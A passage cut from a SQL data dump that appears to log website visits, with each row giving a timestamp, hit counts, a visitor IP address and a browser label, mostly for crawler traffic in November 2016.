615,1479077152,1,1,0,0,'163.172.65.66','other'),(74616,1479078093,1,1,0,0,'163.172.65.115','other'),(74617,1479078177,1,1,0,0,'66.249.76.15','chrome'),(74618,1479078336,2,1,1,0,'66.249.76.13',''),(74619,1479078391,1,1,0,0,'163.172.66.154','other'),(74620,1479078519,1,1,0,0,'163.172.66.97','other'),(74621,1479078855,1,1,0,0,'163.172.65.187','other'),(74622,1479079385,1,1,0,0,'163.172.65.252','other'),(74623,1479080115,1,1,0,0,'163.172.66.76','other'),(74624,1479080190,1,1,0,0,'163.172.66.31','other'),(74625,1479080570,1,1,0,0,'163.172.66.159','other'),(74626,1479080685,1,1,0,0,'163.172.64.231','other'),(74627,1479081409,1,1,0,0,'163.172.66.85','other'),(74628,1479081600,1,1,0,0,'163.172.66.118','other'),(74629,1479081647,1,1,0,0,'157.55.39.101','other'),(74630,1479081956,1,1,0,0,'163.172.66.162','other'),(74631,1479082829,1,1,0,0,'163.172.64.227','other'),(74632,1479083299,1,1,0,0,'163.172.66.174','other'),(74633,1479083488,1,1,0,0,'66.249.76.13','chrome'),(74634,1479084200,1,1,0,0,'163.172.64.236','other'),(74635,1479084363,1,1,0,0,'163.172.66.18','other'),(74636,1479084591,1,1,0,0,'163.172.66.55','other'),(74637,1479085006,1,1,0,0,'163.172.65.113','other'),(74638,1479085213,1,1,0,0,'163.172.66.72','other'),(74639,1479087519,1,1,0,0,'163.172.65.209','other'),(74640,1479087978,1,1,0,0,'66.249.64.59','chrome'),(74641,1479089076,1,1,0,0,'163.172.65.10','other'),(74642,1479089188,1,1,0,0,'163.172.66.40','other'),(74643,1479089296,1,1,0,0,'163.172.65.60','other'),(74644,1479089744,1,1,0,0,'163.172.65.108','other'),(74645,1479090037,1,1,0,0,'163.172.64.241','other'),(74646,1479090335,1,1,0,0,'163.172.66.97','other'),(74647,1479090728,1,1,0,0,'163.172.66.50','other'),(74648,1479091413,1,1,0,0,'163.172.66.42','other'),(74649,1479092042,1,1,0,0,'163.172.66.75','other'),(74650,1479092247,1,1,0,0,'163.172.65.192','other'),(74651,1479092304,1,1,0,0,'163.172.65.110','other'),(74652,1479092703,1,1,0,0,'163.172.66.159','other'),(74653,1479093065,1,1,0,0,'180.76.15.139','other'),(74654,1479093798,1,1,0,0,'163.172.65.109','other'),(74655,1479094012,1,1,0,0,'40.77.167.39','other'),(74656,1479094182,1,1,0,0,'163.172.66.70','other'),(74657,1479095579,1,1,0,0,'66.102.9.27','other'),(74658,1479098300,1,1,0,0,'163.172.65.65','other'),(74659,1479098746,1,1,0,0,'163.172.66.140','other'),(74660,1479099086,1,0,1,0,'66.249.64.183',''),(74661,1479099239,1,1,0,0,'163.172.65.107','other'),(74662,1479100394,1,1,0,0,'163.172.64.225','other'),(74663,1479100986,1,1,0,0,'40.77.167.8','other'),(74664,1479101945,1,1,0,0,'163.172.66.128','other'),(74665,1479102569,1,1,0,0,'163.172.66.96','other'),(74666,1479103300,1,1,0,0,'163.172.66.21','other'),(74667,1479103710,1,1,0,0,'163.172.66.134','other'),(74668,1479104049,1,1,0,0,'40.77.167.39','other'),(74669,1479105096,1,1,0,0,'163.172.64.217','other'),(74670,1479105264,1,1,0,0,'207.46.13.33','other'),(74671,1479105464,1,1,0,0,'180.76.15.158','other'),(74672,1479105579,1,1,0,0,'163.172.66.168','other'),(74673,1479105940,1,1,0,0,'91.196.178.70','chrome'),(74674,1479106017,1,1,0,0,'37.53.228.213','firefox'),(74675,1479106243,1,1,0,0,'163.172.66.133','other'),(74676,1479106287,1,1,0,0,'163.172.64.193','other'),(74677,1479106843,1,1,0,0,'94.179.34.64','firefox'),(74678,1479106872,1,1,0,0,'91.196.178.68','firefox'),(74679,1479107705,1,1,0,0,'163.172.65.128','other'),(74680,1479108102,1,1,0,0,'163.172.66.138','other'),(74681,1479108314,1,1,0,0,'163.172.65.38','other'),(74682,1479109103,1,1,0,0,'163.172.65.34','other'),(74683,1479109487,1,1,0,0,'31.43.29.129','firefox'),(74684,1479109491,1,1,0,0,'66.102.9.29','chrome'),(74685,1479109543,1,1,0,0,'163.172.66.184','other'),(74686,1479109580,1,1,0,0,'91.196.178.69','firefox'),(74687,1479109743,1,1,0,0,'163.172.66.78','other'),(74688,1479109882,1,1,0,0,'91.196.178.161','chrome'),(74689,1479110689,1,1,0,0,'141.8.142.58','other'),(74690,1479110690,1,1,0,0,'141.8.142.61','other'),(74691,1479112110,1,1,0,0,'178.92.170.44','chrome'),(74692,1479112916,1,1,0,0,'194.44.194.114','chrome'),(74693,1479113222,1,1,0,0,'207.46.13.33','other'),(74694,1479113765,1,1,0,0,'82.207.91.234','firefox'),(74695,1479113962,1,1,0,0,'163.172.65.65','other'),(74696,1479114035,1,1,0,0,'163.172.64.252','other'),(74697,1479114441,1,1,0,0,'163.172.66.146','other'),(74698,1479114770,1,1,0,0,'163.172.64.244','other'),(74699,1479114870,1,1,0,0,'163.172.66.15','other'),(74700,1479114958,1,1,0,0,'66.249.83.75','chrome'),(74701,1479114959,1,1,0,0,'66.249.83.74','chrome'),(74702,1479115313,1,1,0,0,'163.172.66.159','other'),(74703,1479115633,1,1,0,0,'163.172.65.5','other'),(74704,1479115653,1,1,0,0,'130.193.50.34','other'),(74705,1479115763,1,1,0,0,'40.77.167.8','other'),(74706,1479116015,1,1,0,0,'195.230.134.157','firefox'),(74707,1479116780,1,1,0,0,'163.172.66.112','other'),(74708,1479117508,1,1,0,0,'163.172.64.229','other'),(74709,1479117643,1,1,0,0,'163.172.66.182','other'),(74710,1479118129,2,2,0,0,'141.8.183.25','other'),(74711,1479119134,1,1,0,0,'91.196.178.66','firefox'),(74712,1479119249,1,1,0,0,'91.196.177.46','firefox'),(74713,1479119352,1,1,0,0,'163.172.65.195','other'),(74714,1479119397,1,1,0,0,'163.172.65.57','other'),(74715,1479119836,1,0,1,0,'66.249.64.179',''),(74716,1479119846,1,1,0,0,'141.8.183.25','other'),(74717,1479120018,1,1,0,0,'163.172.65.239','other'),(74718,1479120139,1,1,0,0,'163.172.66.32','other'),(74719,1479120398,1,1,0,0,'163.172.64.183','other'),(74720,1479120440,2,2,0,0,'46.200.97.188','chrome'),(74721,1479120925,1,1,0,0,'95.134.185.128','chrome'),(74722,1479121327,1,1,0,0,'91.196.178.161','chrome'),(74723,1479121387,1,1,0,0,'130.193.50.34','other'),(74724,1479121946,1,1,0,0,'178.92.170.50','chrome'),(74725,1479122059,1,1,0,0,'91.196.178.132','firefox'),(74726,1479122126,1,1,0,0,'163.172.65.229','other'),(74727,1479122946,1,1,0,0,'163.172.66.138','other'),(74728,1479123207,1,1,0,0,'163.172.65.198','other'),(74729,1479123363,1,1,0,0,'163.172.66.134','other'),(74730,1479123987,1,1,0,0,'163.172.66.92','other'),(74731,1479124277,1,1,0,0,'194.44.220.194','firefox'),(74732,1479124445,1,1,0,0,'93.75.36.87','other'),(74733,1479124595,1,1,0,0,'31.134.122.47','chrome'),(74734,1479125101,1,1,0,0,'163.172.66.166','other'),(74735,1479125283,1,1,0,0,'163.172.65.189','other'),(74736,1479126211,1,1,0,0,'141.8.183.25','other'),(74737,1479126216,1,1,0,0,'91.196.178.70','firefox'),(74738,1479126778,1,1,0,0,'163.172.65.22','other'),(74739,1479126979,1,1,0,0,'163.172.65.181','other'),(74740,1479127605,1,1,0,0,'163.172.66.30','other'),(74741,1479128172,1,1,0,0,'91.196.178.65','chrome'),(74742,1479128194,1,1,0,0,'130.193.50.34','other'),(74743,1479128633,1,1,0,0,'92.113.132.50','chrome'),(74744,1479128742,1,1,0,0,'180.76.15.147','other'),(74745,1479128744,1,1,0,0,'64.233.172.153','chrome'),(74746,1479129114,1,1,0,0,'40.77.167.39','other'),(74747,1479129222,1,1,0,0,'163.172.66.78','other'),(74748,1479129231,1,1,0,0,'163.172.66.144','other'),(74749,1479130413,1,1,0,0,'180.76.15.16','other'),(74750,1479130556,1,1,0,0,'163.172.65.17','other'),(74751,1479132161,1,1,0,0,'163.172.65.194','other'),(74752,1479132433,1,1,0,0,'163.172.65.10','other'),(74753,1479132471,1,1,0,0,'130.193.50.34','other'),(74754,1479132630,1,1,0,0,'163.172.66.93','other'),(74755,1479132655,1,1,0,0,'163.172.65.205','other'),(74756,1479133319,1,1,0,0,'163.172.66.40','other'),(74757,1479133849,1,1,0,0,'130.193.50.34','other'),(74758,1479133994,1,1,0,0,'91.196.178.164','chrome'),(74759,1479135039,1,1,0,0,'163.172.65.202','other'),(74760,1479135724,1,1,0,0,'91.196.178.161','chrome'),(74761,1479135765,1,1,0,0,'91.196.178.65','chrome'),(74762,1479135965,1,1,0,0,'163.172.66.87','other'),(74763,1479136119,1,1,0,0,'163.172.66.67','other'),(74764,1479136205,1,1,0,0,'163.172.66.73','other'),(74765,1479136232,1,1,0,0,'163.172.66.4','other'),(74766,1479136614,1,1,0,0,'91.196.178.37','chrome'),(74767,1479137489,1,1,0,0,'163.172.66.142','other'),(74768,1479137507,1,1,0,0,'207.46.13.33','other'),(74769,1479137832,1,1,0,0,'163.172.65.10','other'),(74770,1479138526,1,1,0,0,'163.172.66.61','other'),(74771,1479139026,1,1,0,0,'91.196.178.65','chrome'),(74772,1479139177,1,1,0,0,'163.172.64.223','other'),(74773,1479139241,1,1,0,0,'207.46.13.33','other'),(74774,1479139262,1,1,0,0,'91.196.178.70','firefox'),(74775,1479139551,1,1,0,0,'163.172.66.81','other'),(74776,1479139913,1,1,0,0,'163.172.66.37','other'),(74777,1479139950,1,1,0,0,'163.172.65.108','other'),(74778,1479140073,1,1,0,0,'163.172.65.216','other'),(74779,1479140334,1,1,0,0,'130.193.50.34','other'),(74780,1479140724,1,0,1,0,'66.249.64.179',''),(74781,1479141544,1,1,0,0,'130.193.50.34','other'),(74782,1479141834,1,1,0,0,'40.77.167.8','other'),(74783,1479141847,1,1,0,0,'163.172.66.87','other'),(74784,1479142395,1,1,0,0,'157.55.39.19','other'),(74785,1479142747,1,1,0,0,'163.172.66.80','other'),(74786,1479142913,1,1,0,0,'163.172.65.118','other'),(74787,1479142926,1,1,0,0,'78.27.173.79','chrome'),(74788,1479144036,1,1,0,0,'163.172.66.117','other'),(74789,1479144291,1,1,0,0,'163.172.66.127','other'),(74790,1479144320,1,1,0,0,'163.172.65.182','other'),(74791,1479144760,1,1,0,0,'180.76.15.5','other'),(74792,1479144932,1,1,0,0,'66.102.9.27','other'),(74793,1479145033,1,1,0,0,'163.172.66.19','other'),(74794,1479145913,1,1,0,0,'163.172.66.25','other'),(74795,1479146503,1,1,0,0,'130.193.50.34','other'),(74796,1479146863,1,1,0,0,'163.172.65.197','other'),(74797,1479146866,1,1,0,0,'163.172.66.182','other'),(74798,1479147476,1,1,0,0,'207.46.13.33','other'),(74799,1479147624,1,1,0,0,'163.172.65.236','other'),(74800,1479147714,1,1,0,0,'163.172.66.123','other'),(74801,1479148163,1,1,0,0,'163.172.66.177','other'),(74802,1479148381,1,1,0,0,'163.172.66.30','other'),(74803,1479148406,1,0,1,0,'68.180.230.220',''),(74804,1479148719,1,1,0,0,'163.172.66.29','other'),(74805,1479148841,1,1,0,0,'163.172.64.253','other'),(74806,1479149494,1,1,0,0,'195.122.197.98','chrome'),(74807,1479150073,1,1,0,0,'163.172.66.48','other'),(74808,1479150213,1,1,0,0,'163.172.66.75','other'),(74809,1479150500,2,1,1,0,'62.210.83.88',''),(74810,1479150995,1,1,0,0,'130.193.50.34','other'),(74811,1479151402,1,1,0,0,'163.172.65.68','other'),(74812,1479151592,1,1,0,0,'163.172.65.49','other'),(74813,1479151800,1,1,0,0,'163.172.65.214','other'),(74814,1479152131,1,1,0,0,'163.172.66.48','other'),(74815,1479152229,1,1,0,0,'163.172.65.208','other'),(74816,1479152906,1,1,0,0,'95.108.133.215','chrome'),(74817,1479153397,1,1,0,0,'163.172.66.166','other'),(74818,1479153953,1,1,0,0,'163.172.65.130','other'),(74819,1479155015,1,1,0,0,'163.172.66.92','other'),(74820,1479155142,1,1,0,0,'163.172.64.227','other'),(74821,1479156037,1,1,0,0,'163.172.66.115','other'),(74822,1479156620,1,1,0,0,'163.172.65.58','other'),(74823,1479156782,1,1,0,0,'163.172.66.75','other'),(74824,1479156815,1,1,0,0,'163.172.66.108','other'),(74825,1479156985,1,1,0,0,'163.172.65.20','other'),(74826,1479157394,1,1,0,0,'93.158.152.26','other'),(74827,1479157813,1,1,0,0,'93.158.152.46','other'),(74828,1479158094,1,1,0,0,'141.8.142.58','other'),(74829,1479158204,2,2,0,0,'141.8.183.25','other'),(74830,1479158311,2,2,0,0,'130.193.50.34','other'),(74831,1479158842,1,0,1,0,'68.180.229.190',''),(74832,1479159309,1,1,0,0,'66.102.9.27','other'),(74833,1479159727,1,1,0,0,'66.249.64.179','chrome'),(74834,1479160019,1,1,0,0,'163.172.65.180','other'),(74835,1479160046,1,1,0,0,'163.172.65.5','other'),(74836,1479160400,1,1,0,0,'163.172.66.15','other'),(74837,1479160595,1,1,0,0,'163.172.65.229','other'),(74838,1479162150,1,1,0,0,'163.172.66.83','other'),(74839,1479162244,1,1,0,0,'66.249.64.57','chrome'),(74840,1479162251,1,1,0,0,'163.172.64.188','other'),(74841,1479162663,1,1,0,0,'130.193.50.38','other'),(74842,1479162715,1,1,0,0,'163.172.66.80','other'),(74843,1479163115,1,1,0,0,'163.172.66.2','other'),(74844,1479163181,1,1,0,0,'163.172.65.198','other'),(74845,1479163928,1,1,0,0,'163.172.64.180','other'),(74846,1479163953,1,1,0,0,'163.172.65.14','other'),(74847,1479164506,1,1,0,0,'163.172.65.190','other'),(74848,1479164564,1,1,0,0,'163.172.66.42','other'),(74849,1479165000,1,0,1,0,'66.249.64.183',''),(74850,1479165036,1,1,0,0,'163.172.65.14','other'),(74851,1479165350,1,1,0,0,'163.172.65.186','other'),(74852,1479165827,1,1,0,0,'163.172.65.11','other'),(74853,1479166207,1,1,0,0,'163.172.65.193','other'),(74854,1479166211,1,1,0,0,'163.172.66.152','other'),(74855,1479167117,1,1,0,0,'163.172.66.150','other'),(74856,1479167587,1,1,0,0,'207.46.13.33','other'),(74857,1479167756,1,1,0,0,'163.172.66.7','other'),(74858,1479167852,1,0,1,0,'66.249.64.61',''),(74859,1479168093,1,1,0,0,'163.172.65.30','other'),(74860,1479168585,1,1,0,0,'163.172.66.128','other'),(74861,1479168626,1,1,0,0,'163.172.66.97','other'),(74862,1479168906,1,1,0,0,'163.172.66.130','other'),(74863,1479168947,1,1,0,0,'163.172.65.181','other'),(74864,1479169251,1,0,1,0,'66.249.64.183',''),(74865,1479169317,1,1,0,0,'163.172.66.71','other'),(74866,1479169372,1,1,0,0,'163.172.65.230','other'),(74867,1479169482,1,1,0,0,'46.37.210.201','chrome'),(74868,1479169856,1,1,0,0,'163.172.66.25','other'),(74869,1479170822,1,1,0,0,'130.193.50.34','other'),(74870,1479170879,1,1,0,0,'163.172.66.121','other'),(74871,1479171061,1,1,0,0,'163.172.66.77','other'),(74872,1479171698,1,1,0,0,'163.172.66.63','other'),(74873,1479171874,1,1,0,0,'163.172.65.51','other'),(74874,1479171936,1,1,0,0,'163.172.65.45','other'),(74875,1479172028,1,1,0,0,'163.172.66.151','other'),(74876,1479172158,1,1,0,0,'163.172.65.185','other'),(74877,1479173306,1,0,1,0,'66.249.64.59',''),(74878,1479173333,1,1,0,0,'163.172.64.236','other'),(74879,1479173738,1,1,0,0,'66.102.9.25','other'),(74880,1479174118,1,1,0,0,'163.172.65.236','other'),(74881,1479174979,1,0,1,0,'66.249.64.61',''),(74882,1479175031,1,1,0,0,'141.8.183.25','other'),(74883,1479175040,1,1,0,0,'163.172.66.63','other'),(74884,1479175268,1,1,0,0,'163.172.66.146','other'),(74885,1479176587,1,1,0,0,'130.193.50.4','other'),(74886,1479176781,1,1,0,0,'163.172.66.165','other'),(74887,1479176849,1,1,0,0,'163.172.65.58','other'),(74888,1479177130,1,1,0,0,'163.172.65.182','other'),(74889,1479177233,1,1,0,0,'163.172.64.179','other'),(74890,1479177309,28,28,0,0,'208.43.225.85','other'),(74891,1479177539,1,1,0,0,'163.172.65.19','other'),(74892,1479177651,1,0,1,0,'66.249.64.183',''),(74893,1479178059,1,1,0,0,'163.172.65.42','other'),(74894,1479178512,1,1,0,0,'163.172.65.16','other'),(74895,1479178723,1,1,0,0,'141.8.132.10','other'),(74896,1479179088,1,1,0,0,'163.172.66.175','other'),(74897,1479179320,1,1,0,0,'163.172.66.145','other'),(74898,1479179804,1,1,0,0,'130.193.51.14','other'),(74899,1479179929,1,1,0,0,'163.172.65.19','other'),(74900,1479180201,1,1,0,0,'66.249.64.179','chrome'),(74901,1479180391,1,1,0,0,'163.172.64.231','other'),(74902,1479181399,1,1,0,0,'141.8.132.30','other'),(74903,1479182190,1,1,0,0,'163.172.64.233','other'),(74904,1479182674,1,0,1,0,'66.249.64.57',''),(74905,1479182676,1,1,0,0,'163.172.66.15','other'),(74906,1479183158,1,1,0,0,'163.172.65.247','other'),(74907,1479183281,1,1,0,0,'180.76.15.158','other'),(74908,1479183507,1,1,0,0,'163.172.64.233','other'),(74909,1479183540,1,1,0,0,'163.172.66.21','other'),(74910,1479184294,1,1,0,0,'163.172.65.25','other'),(74911,1479184471,1,1,0,0,'163.172.66.68','other'),(74912,1479185031,1,0,1,0,'66.249.64.183',''),(74913,1479185068,1,1,0,0,'163.172.65.196','other'),(74914,1479185135,1,1,0,0,'163.172.65.244','other'),(74915,1479185161,1,1,0,0,'163.172.66.180','other'),(74916,1479185340,1,1,0,0,'163.172.66.143','other'),(74917,1479186056,1,0,1,0,'66.249.64.187',''),(74918,1479186449,1,1,0,0,'207.46.13.33','other'),(74919,1479186730,1,0,1,0,'66.249.64.183',''),(74920,1479187035,1,1,0,0,'163.172.66.30','other'),(74921,1479187116,1,1,0,0,'91.196.178.97','chrome'),(74922,1479187140,1,1,0,0,'157.55.39.19','other'),(74923,1479187451,1,1,0,0,'163.172.66.134','other'),(74924,1479188234,1,1,0,0,'66.102.9.27','other'),(74925,1479188364,1,1,0,0,'163.172.65.222','other'),(74926,1479188515,1,1,0,0,'163.172.66.117','other'),(74927,1479188581,1,1,0,0,'163.172.66.49','other'),(74928,1479190493,2,1,1,0,'62.210.83.88',''),(74929,1479190932,1,0,1,0,'66.249.64.183',''),(74930,1479191040,2,2,0,0,'91.196.178.71','firefox'),(74931,1479191243,1,0,1,0,'66.249.64.187',''),(74932,1479191278,1,1,0,0,'94.179.65.174','firefox'),(74933,1479191325,1,1,0,0,'91.196.178.67','chrome'),(74934,1479192049,1,1,0,0,'163.172.65.16','other'),(74935,1479192199,1,1,0,0,'163.172.66.121','other'),(74936,1479193142,1,1,0,0,'163.172.66.154','other'),(74937,1479193321,1,0,1,0,'66.249.64.57',''),(74938,1479193514,1,1,0,0,'163.172.66.92','other'),(74939,1479193958,1,1,0,0,'91.196.178.68','chrome'),(74940,1479194225,1,1,0,0,'163.172.64.245','other'),(74941,1479194996,1,0,1,0,'66.249.64.183',''),(74942,1479195136,1,1,0,0,'94.179.209.79','firefox'),(74943,1479195831,1,1,0,0,'91.196.177.46','firefox'),(74944,1479197055,1,1,0,0,'130.180.217.249','firefox'),(74945,1479197097,1,0,1,0,'66.249.64.187',''),(74946,1479197387,2,2,0,0,'91.196.177.46','firefox'),(74947,1479197597,1,1,0,0,'91.196.178.67','chrome'),(74948,1479197723,1,1,0,0,'163.172.65.8','other'),(74949,1479197975,1,1,0,0,'213.169.66.25','other'),(74950,1479198294,1,1,0,0,'163.172.66.26','other'),(74951,1479198433,1,1,0,0,'163.172.65.239','other'),(74952,1479198520,1,1,0,0,'66.102.9.25','chrome'),(74953,1479199054,1,1,0,0,'180.76.15.9','other'),(74954,1479199058,1,1,0,0,'163.172.66.151','other'),(74955,1479199195,1,1,0,0,'163.172.65.248','other'),(74956,1479199478,1,0,1,0,'66.249.64.187',''),(74957,1479199617,1,1,0,0,'163.172.65.225','other'),(74958,1479199951,1,1,0,0,'130.193.50.34','other'),(74959,1479200131,1,1,0,0,'163.172.64.250','other'),(74960,1479200212,1,1,0,0,'163.172.66.45','other'),(74961,1479200347,1,1,0,0,'157.55.39.19','other'),(74962,1479200380,1,1,0,0,'163.172.66.130','other'),(74963,1479201111,1,1,0,0,'195.230.129.94','chrome'),(74964,1479201227,1,1,0,0,'37.55.179.206','chrome'),(74965,1479201396,1,1,0,0,'141.8.183.25','other'),(74966,1479201570,1,0,1,0,'68.180.230.220',''),(74967,1479201914,1,1,0,0,'91.196.178.65','chrome'),(74968,1479202500,1,1,0,0,'91.196.178.162','chrome'),(74969,1479202576,1,1,0,0,'66.102.9.25','other'),(74970,1479202623,1,1,0,0,'163.172.65.49','other'),(74971,1479203309,1,1,0,0,'163.172.65.227','other'),(74972,1479203371,1,1,0,0,'163.172.66.128','other'),(74973,1479203491,1,1,0,0,'163.172.66.70','other'),(74974,1479203581,1,0,1,0,'66.249.64.183',''),(74975,1479204122,1,1,0,0,'91.196.178.71','firefox'),(74976,1479204401,1,1,0,0,'91.196.177.46','firefox'),(74977,1479204606,1,1,0,0,'130.193.50.34','other'),(74978,1479204648,1,0,1,0,'66.249.64.183',''),(74979,1479205504,1,1,0,0,'163.172.66.87','other'),(74980,1479205640,1,1,0,0,'163.172.65.22','other'),(74981,1479205700,1,1,0,0,'163.172.65.244','other'),(74982,1479206513,1,1,0,0,'163.172.66.103','other'),(74983,1479206603,2,2,0,0,'94.178.234.81','firefox'),(74984,1479206917,1,1,0,0,'163.172.66.165','other'),(74985,1479207197,1,1,0,0,'163.172.64.247','other'),(74986,1479207229,1,1,0,0,'163.172.65.199','other'),(74987,1479207432,1,1,0,0,'163.172.64.252','other'),(74988,1479207773,1,0,1,0,'66.249.64.187',''),(74989,1479208208,1,1,0,0,'163.172.66.91','other'),(74990,1479208424,1,1,0,0,'163.172.66.76','other'),(74991,1479208895,1,0,1,0,'66.249.64.61',''),(74992,1479209683,1,0,1,0,'66.249.64.179',''),(74993,1479209859,1,1,0,0,'91.196.178.70','firefox'),(74994,1479210216,1,1,0,0,'130.193.50.34','other'),(74995,1479210522,1,1,0,0,'94.179.209.79','firefox'),(74996,1479211389,1,1,0,0,'207.46.13.33','other'),(74997,1479211790,1,0,1,0,'66.249.64.179',''),(74998,1479212085,1,0,1,0,'66.249.64.183',''),(74999,1479212293,1,1,0,0,'91.234.0.126','chrome'),(75000,1479212469,1,0,1,0,'66.249.64.187',''),(75001,1479214153,1,0,1,0,'66.249.64.57',''),(75002,1479214658,1,1,0,0,'91.196.178.66','firefox'),(75003,1479214863,1,0,1,0,'66.249.64.187',''),(75004,1479214948,1,0,1,0,'66.249.64.179',''),(75005,1479215268,1,1,0,0,'91.196.178.162','firefox'),(75006,1479215276,3,0,3,0,'66.249.64.183',''),(75007,1479216963,1,1,0,0,'91.196.178.162','chrome'),(75008,1479216993,1,1,0,0,'66.102.9.27','other'),(75009,1479217018,1,1,0,0,'91.196.178.70','firefox'),(75010,1479217059,1,0,1,0,'66.249.64.179',''),(75011,1479217156,1,1,0,0,'91.196.178.67','other'),(75012,1479217197,1,1,0,0,'94.179.209.79','firefox'),(75013,1479217809,1,0,1,0,'66.249.64.183',''),(75014,1479218660,1,0,1,0,'68.180.230.220',''),(75015,1479218693,1,1,0,0,'180.76.15.158','other'),(75016,1479219083,1,0,1,0,'66.249.64.187',''),(75017,1479219177,2,1,1,0,'66.249.64.187',''),(75018,1479219450,1,1,0,0,'46.211.1.225','chrome'),(75019,1479219696,2,0,2,0,'66.249.64.179',''),(75020,1479219822,1,1,0,0,'66.249.64.59','chrome'),(75021,1479219981,1,1,0,0,'95.135.91.246','chrome'),(75022,1479220177,1,1,0,0,'91.196.178.162','chrome'),(75023,1479220391,1,0,1,0,'66.249.64.183',''),(75024,1479220673,1,1,0,0,'157.55.39.19','other'),(75025,1479221941,1,1,0,0,'141.8.183.25','other'),(75026,1479222074,2,0,2,0,'66.249.64.179',''),(75027,1479222242,1,0,1,0,'66.249.64.187',''),(75028,1479222354,1,1,0,0,'77.93.41.218','chrome'),(75029,1479222454,1,1,0,0,'82.207.35.20','msie'),(75030,1479223099,1,1,0,0,'91.196.178.67','other'),(75031,1479223195,3,0,3,0,'66.249.64.183',''),(75032,1479224161,1,0,1,0,'66.249.64.179',''),(75033,1479224313,2,0,2,0,'66.249.64.187',''),(75034,1479224633,1,1,0,0,'91.196.178.37','chrome'),(75035,1479224708,1,1,0,0,'195.26.67.20','other'),(75036,1479225223,1,1,0,0,'192.162.237.47','firefox'),(75037,1479225838,1,1,0,0,'159.224.14.159','chrome'),(75038,1479226042,1,1,0,0,'66.249.64.183','chrome'),(75039,1479226948,1,0,1,0,'66.249.64.187',''),(75040,1479227843,2,0,2,0,'66.249.64.183',''),(75041,1479228101,1,0,1,0,'66.249.64.179',''),(75042,1479228125,1,0,1,0,'66.249.64.187',''),(75043,1479228775,1,1,0,0,'46.211.3.251','other'),(75044,1479229577,1,1,0,0,'141.8.183.25','other'),(75045,1479229886,1,0,1,0,'66.249.64.179',''),(75046,1479230754,1,1,0,0,'91.196.178.166','other'),(75047,1479230913,1,0,1,0,'66.249.64.179',''),(75048,1479230964,1,1,0,0,'130.193.50.34','other'),(75049,1479232768,1,1,0,0,'94.179.209.79','firefox'),(75050,1479233918,1,1,0,0,'157.55.39.19','other'),(75051,1479234070,1,1,0,0,'91.196.178.38','chrome'),(75052,1479234677,1,0,1,0,'66.249.64.187',''),(75053,1479234751,1,0,1,0,'68.180.230.220',''),(75054,1479235148,1,1,0,0,'40.77.167.8','other'),(75055,1479235343,1,1,0,0,'163.172.64.217','other'),(75056,1479235431,1,1,0,0,'163.172.66.126','other'),(75057,1479236126,1,1,0,0,'163.172.66.34','other'),(75058,1479236326,1,1,0,0,'163.172.65.200','other'),(75059,1479236838,1,1,0,0,'178.255.215.94','other'),(75060,1479236869,1,1,0,0,'163.172.66.69','other'),(75061,1479236987,1,0,1,0,'66.249.64.187',''),(75062,1479237045,2,0,2,0,'66.249.64.183',''),(75063,1479237283,1,0,1,0,'66.249.64.179',''),(75064,1479237977,1,1,0,0,'163.172.65.251','other'),(75065,1479238120,1,1,0,0,'163.172.65.185','other'),(75066,1479238694,3,0,3,0,'66.249.64.183',''),(75067,1479239042,2,0,2,0,'66.249.64.187',''),(75068,1479239047,1,1,0,0,'130.193.50.34','other'),(75069,1479239186,1,1,0,0,'163.172.64.250','other'),(75070,1479239799,1,1,0,0,'163.172.66.6','other'),(75071,1479240082,1,1,0,0,'163.172.65.22','other'),(75072,1479240126,1,1,0,0,'163.172.64.193','other'),(75073,1479240325,1,1,0,0,'163.172.64.233','other'),(75074,1479240356,1,1,0,0,'163.172.66.64','other'),(75075,1479240842,1,1,0,0,'94.179.14.109','firefox'),(75076,1479241255,2,0,2,0,'66.249.64.183',''),(75077,1479243781,1,1,0,0,'163.172.65.46','other'),(75078,1479243955,1,1,0,0,'163.172.66.61','other'),(75079,1479243985,1,1,0,0,'91.211.132.48','chrome'),(75080,1479244555,1,1,0,0,'163.172.64.192','other'),(75081,1479244713,1,0,1,0,'66.249.64.179',''),(75082,1479245098,1,1,0,0,'163.172.66.146','other'),(75083,1479245569,1,1,0,0,'163.172.65.199','other'),(75084,1479245816,1,0,1,0,'66.249.64.183',''),(75085,1479245887,1,1,0,0,'163.172.65.242','other'),(75086,1479246806,1,1,0,0,'163.172.65.52','other'),(75087,1479246899,1,0,1,0,'66.249.66.81',''),(75088,1479247582,1,1,0,0,'163.172.65.116','other'),(75089,1479247671,1,1,0,0,'157.55.39.96','other'),(75090,1479247975,1,1,0,0,'163.172.64.228','other'),(75091,1479248568,1,0,1,0,'66.249.66.87',''),(75092,1479249094,1,1,0,0,'163.172.64.242','other'),(75093,1479249627,1,1,0,0,'163.172.66.96','other'),(75094,1479250007,1,0,1,0,'66.249.66.81',''),(75095,1479250067,1,1,0,0,'163.172.66.48','other'),(75096,1479250131,1,0,1,0,'66.249.66.87',''),(75097,1479250164,1,1,0,0,'163.172.65.67','other'),(75098,1479250379,1,0,1,0,'66.249.66.180',''),(75099,1479250447,1,1,0,0,'163.172.65.43','other'),(75100,1479250504,1,1,0,0,'163.172.66.68','other'),(75101,1479251057,1,1,0,0,'163.172.66.58','other'),(75102,1479251165,1,1,0,0,'163.172.64.227','other'),(75103,1479251641,1,1,0,0,'163.172.64.241','other'),(75104,1479252100,1,1,0,0,'163.172.66.175','other'),(75105,1479252549,1,1,0,0,'163.172.66.68','other'),(75106,1479252745,1,1,0,0,'163.172.66.115','other'),(75107,1479252838,1,1,0,0,'163.172.65.25','other'),(75108,1479253462,1,1,0,0,'163.172.66.169','other'),(75109,1479253986,1,1,0,0,'163.172.66.84','other'),(75110,1479253989,1,1,0,0,'163.172.66.119','other'),(75111,1479254818,1,0,1,0,'66.249.66.81',''),(75112,1479255118,1,1,0,0,'163.172.66.39','other'),(75113,1479255312,1,1,0,0,'163.172.65.2','other'),(75114,1479255513,1,1,0,0,'163.172.66.184','other'),(75115,1479256079,1,0,1,0,'66.249.66.87',''),(75116,1479256802,1,1,0,0,'157.55.39.96','other'),(75117,1479257413,1,1,0,0,'163.172.65.19','other'),(75118,1479257811,1,1,0,0,'163.172.66.11','other'),(75119,1479257914,1,1,0,0,'163.172.66.150','other'),(75120,1479258030,1,1,0,0,'213.136.78.176','chrome'),(75121,1479258059,1,1,0,0,'163.172.65.13','other'),(75122,1479258215,1,1,0,0,'163.172.66.37','other'),(75123,1479258296,1,0,1,0,'66.249.66.87',''),(75124,1479258448,1,1,0,0,'163.172.65.222','other'),(75125,1479259030,1,1,0,0,'163.172.66.77','other'),(75126,1479259469,1,1,0,0,'163.172.65.23','other'),(75127,1479259530,1,1,0,0,'163.172.66.98','other'),(75128,1479259939,1,0,1,0,'66.249.66.81',''),(7512